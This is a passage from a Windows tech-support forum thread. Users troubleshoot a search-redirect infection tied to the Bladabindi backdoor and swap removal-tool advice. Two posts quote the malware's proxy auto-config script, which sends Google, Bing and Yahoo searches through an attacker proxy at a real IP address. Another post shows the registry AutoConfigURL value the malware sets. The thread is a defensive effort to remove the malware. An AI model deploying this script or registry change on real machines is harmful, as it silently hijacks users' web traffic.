Google redirection localhost.world

Page 2 of 12 FirstFirst 1234 ... LastLast
  1. eLPuSHeR's Avatar
    Posts : 2,447
    Windows 10 Home x64
       #11

    You should try Roguekiller too.
      My Computer

  2. axe0's Avatar
    Posts : 14,785
    Windows 10 Pro
       #12

    My standard template for infections. (edited as you have used a few things)
    Please run a threat scan with Malwarebytes*, a full scan with your AV, scan your system with Kaspersky TTDSKiller and ESET Online Scanner
    *(Uncheck trial version in the installation process)
    What happens if you set the network configuration to 'automatic detect settings'?
      My Computers


  3. Posts : 3
    win7x64
       #13

    Delibrythe said:
    Bonjour Flavien! :)

    Have you tried ZHPCleaner? I highly recommend it. http://nicolascoolman.com/download/zhpcleaner/
    Had same issues, blocked 69.197.188.122 in firewall, and ran ZHPCleaner; seems to have done the trick so far.

    This was the content of the localhost.world file:
    Code:
    function FindProxyForURL(url, host) {
    
         if (shExpMatch(host, "www.bing.com")) return "PROXY 69.197.188.122:8484"; 
        if (shExpMatch(host, "*.search.yahoo.com")) return "PROXY 69.197.188.122:8484";    
    
        ga = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ga.test(url)) { return "PROXY 69.197.188.122:8484" }
        
    
        gb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (gb.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        
        gc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (gc.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        
        gd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gd.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        ge = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (ge.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        gx = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gx.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        
        return "DIRECT";
    
    }
    BTW; I also updated the firmware for my Asus-router...
      My Computer


  4. Posts : 3
    win7x64
       #14

    Nah...


    Nah... still not gotten rid of it...

    Malwarebytes Anti-Malware found some more unwated stuff; works for now
    Last edited by nakiel; 05 Nov 2015 at 07:31.
      My Computer

  5. Borg 386's Avatar
    Posts : 28,685
    Win 7 32, Win 7 64 Pro, Win 8.1 64 Pro, Win 10 64 Education Edition
       #15

    You might want to check you host file to see if that's been altered or corrupted.

    Also, wouldn't hurt to flush your DNS.

    Flush DNS - What's My DNS?
      My Computer


  6. Posts : 1
    Windows 10
       #16

    The solution that worked for me


    Delibrythe said:
    Pas de problème I hope it works for you!
    After using almost all antivirus, spyware and malware removing programs and crashing one computer, I found out a work around.
    And that is to delete the infected account and start a new account.
      My Computer


  7. Posts : 21
    10 64bit
       #17

    nakiel said:
    Had same issues, blocked 69.197.188.122 in firewall, and ran ZHPCleaner; seems to have done the trick so far.

    This was the content of the localhost.world file:
    Code:
    function FindProxyForURL(url, host) {
    
         if (shExpMatch(host, "www.bing.com")) return "PROXY 69.197.188.122:8484"; 
        if (shExpMatch(host, "*.search.yahoo.com")) return "PROXY 69.197.188.122:8484";    
    
        ga = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ga.test(url)) { return "PROXY 69.197.188.122:8484" }
        
    
        gb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (gb.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        
        gc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (gc.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        
        gd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gd.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        ge = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (ge.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        gx = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (gx.test(url)) { return "PROXY 69.197.188.122:8484" }
    
        
        return "DIRECT";
    
    }
    BTW; I also updated the firmware for my Asus-router...
    Having same issue. Did it come back for you? It just came back for me, I saw in proxy settings that localworld was setup again. I ran ZHPCleaner and fixed everything a couple of days ago but it didn't stick.

    BTW the virus that caused this for me is Backdoor:MSIL/Bladabindi -- this is a pretty annoying virus. Windows Defender caught it immediately but I guess there are still traces left. I ran everything recommended in this thread (Rogue killer, TDS killer, Eset online scan, ZHP cleaner, MBAR)
      My Computer


  8. Posts : 3
    win7x64
       #18

    It came back! Currently been testing "HitmanPro" for a couple of days; no relapse yet...

    Found this in registry:
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"="http://localhost.world/localhost.host"
      My Computer

  9. simrick's Avatar
    Posts : 16,108
    W10Prox64
       #19

    mixolyd said:
    BTW the virus that caused this for me is Backdoor:MSIL/Bladabindi -- this is a pretty annoying virus. Windows Defender caught it immediately but I guess there are still traces left. I ran everything recommended in this thread (Rogue killer, TDS killer, Eset online scan, ZHP cleaner, MBAR)
    Might want to consider changing your passwords...

    This malware family can steal your sensitive information and send it to a malicious hacker. The family can also download other malware and give backdoor access to your PC.

    Variants of the family can spread via infected removable drives, such as USB flash drives. They can also be downloaded by other malware, or spread though malicious links and hacked websites.
    MSILBladabindi
      My Computer


  10. Posts : 21
    10 64bit
       #20

    nakiel said:
    It came back! Currently been testing "HitmanPro" for a couple of days; no relapse yet...

    Found this in registry:
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"="http://localhost.world/localhost.host"
    Thanks! I scanned w/ HitmanPro and it found nothing. I did find that registry key though. I think that was the last trace of this virus (hopefully)

    simrick said:
    Might want to consider changing your passwords...
    simrick said:


    Yeah I thought about that.. but Windows Defender found the virus as soon as I opened the file and immediately quarantined it, so I really don't think it had time to do anything except create this annoying proxy which just redirects google to this IP. I do not think (at least hopefully) the backdoor was active at any point. Thanks though
      My Computer


 
Page 2 of 12 FirstFirst 1234 ... LastLast

  Related Discussions
Our Sites
Site Links
About Us
Windows 10 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 10" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd
All times are GMT -5. The time now is 18:15.
Find Us




Windows 10 Forums